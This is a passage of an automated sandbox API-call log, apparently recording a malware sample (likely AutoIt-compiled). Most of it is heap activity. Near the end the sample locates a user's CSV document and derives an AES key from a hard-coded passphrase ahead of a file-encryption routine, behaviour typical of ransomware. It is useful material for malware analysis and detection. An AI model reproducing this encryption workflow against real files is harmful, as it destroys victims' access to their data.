(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.818] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.819] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0078.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.820] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.820] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0078.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca700, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.823] CloseHandle (hObject=0x298) returned 1 [0078.823] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.823] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.823] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bf4640, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa7a67830, ftLastAccessTime.dwHighDateTime=0x1d5eb55, ftLastWriteTime.dwLowDateTime=0xa7a67830, ftLastWriteTime.dwHighDateTime=0x1d5eb55, nFileSizeHigh=0x0, nFileSizeLow=0x740a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="7QJQVMK.csv", cAlternateFileName="")) returned 0x41ac140 [0078.823] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0078.823] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.824] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0078.825] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.825] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.825] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.825] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.825] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0078.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.825] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.826] CryptHashData (hHash=0x41ac740, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.826] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.826] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0078.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.826] CryptDestroyHash (hHash=0x41ac740) returned 1 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 